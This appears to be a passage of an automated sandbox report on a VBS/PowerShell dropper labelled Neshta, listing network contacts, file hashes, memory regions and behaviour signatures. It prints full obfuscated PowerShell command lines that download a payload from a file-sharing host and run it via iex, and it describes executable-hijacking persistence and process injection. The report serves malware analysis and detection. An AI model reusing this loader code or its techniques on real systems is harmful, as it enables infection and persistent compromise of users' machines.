Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr Spil. skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.sendspace.com udp
US 172.67.170.105:443 www.sendspace.com tcp
US 8.8.8.8:53 fs13n3.sendspace.com udp
CA 69.31.136.57:443 fs13n3.sendspace.com tcp
US 8.8.8.8:53 crt.sectigo.com udp
US 104.18.38.233:80 crt.sectigo.com tcp
US 172.67.170.105:443 www.sendspace.com tcp
US 8.8.8.8:53 fs12n2.sendspace.com udp
CA 69.31.136.53:443 fs12n2.sendspace.com tcp

Files

memory/2912-4-0x000007FEF5F4E000-0x000007FEF5F4F000-memory.dmp

memory/2912-5-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2912-6-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2912-7-0x000000001B180000-0x000000001B462000-memory.dmp

memory/2912-8-0x0000000002460000-0x0000000002468000-memory.dmp

memory/2912-9-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2912-10-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\TarC49E.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\39VPP6LH4NG91G1DDE56.temp

MD5 72cd28613fe5100b7b72f58feaf684e4
SHA1 7a010ad9cd9305e218e6569a0cf2c0e4fbe4efde
SHA256 aebfb59d1b36ef7dda7c7c90d5661fee0f443507baeb411feb5ca81f2d6cbafc
SHA512 07e90fbd2a759381344bd30eda4032b7413ce9771296f33e1bb0958495c2896f4e8aa141986c58172c6462c66685af82302839916390ef1a2c6c50ddf434913c

C:\Users\Admin\AppData\Roaming\Omrystninger.Dim

MD5 6d9b6accceeb8d1903ff212fe516a08e
SHA1 dde8ef0bd8cee4dd7593de179183a6a0afb5e1cc
SHA256 2f65e63154ec396206d3ca6ce8ac0210b09598f0c61e6038161ad66fb5e80138
SHA512 48031eff35c6ef2dc0c05e750ddc960c6031fbb16f41843f0f0c01a0c59d76b71283793428f20974800ff880555606d6fbb4e1ad8f48220a38e9725ed6eac420

memory/2912-57-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2912-58-0x000007FEF5F4E000-0x000007FEF5F4F000-memory.dmp

memory/2388-60-0x00000000061D0000-0x000000000B7C7000-memory.dmp

memory/2240-62-0x0000000000BF0000-0x0000000001C52000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9e37dd2438a74fb3646584b29432615b
SHA1 80f8361487288eaa37bde6fb13847bacd7f86fc6
SHA256 bc783ebaced5a5c6123035ebacf3d3be7607579e0f4cd6446cf0af617ee7e5b3
SHA512 89c4a7e8aed727049210784ec2c327c0b5f3c92a64c4c0784113752993f1b07bb0fd705b5dd1149e665ca9aa9a56162ef098759b490a05ecd8193cae50559efd

memory/2240-90-0x0000000000BF0000-0x0000000001C52000-memory.dmp

memory/2912-92-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe

MD5 fa9e52ffa7ca60c38d490abd96cb3952
SHA1 b8ef0fafe68035128978f0383fab3863301aa62e
SHA256 d416c89d8a396915106fb2462430d90bbe1be05c444098bfc671bb3d12089d96
SHA512 26d959e451ee66a26ead7b7971b3993c3f6882abd912ba5a641215cb90f18bbb7ac94e7ae3008bbf2c1c497e6989b8a607b63967b6dd3aa1ef4a5a953342d1ce

\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE

MD5 9e2b9928c89a9d0da1d3e8f4bd96afa7
SHA1 ec66cda99f44b62470c6930e5afda061579cde35
SHA256 8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043
SHA512 2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

memory/2240-122-0x0000000000BF0000-0x0000000001C52000-memory.dmp

memory/2240-173-0x0000000000BF0000-0x0000000001C52000-memory.dmp

memory/2240-174-0x0000000000BF0000-0x0000000001C52000-memory.dmp

memory/2240-175-0x0000000000BF0000-0x0000000001C52000-memory.dmp

memory/2240-177-0x0000000000BF0000-0x0000000001C52000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-23 16:23

Reported

2024-05-23 16:25

Platform

win10v2004-20240508-en

Max time kernel

93s

Max time network

98s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\time.vbs"

Signatures

Neshta

persistence spyware neshta

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 872 set thread context of 412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE C:\Program Files (x86)\windows mail\wab.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\svchost.com C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4236 wrote to memory of 748 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 748 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 4036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 748 wrote to memory of 4036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 748 wrote to memory of 872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 872 wrote to memory of 1944 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 872 wrote to memory of 1944 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 872 wrote to memory of 1944 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 872 wrote to memory of 412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 872 wrote to memory of 412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 872 wrote to memory of 412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 872 wrote to memory of 412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 872 wrote to memory of 412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\time.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane 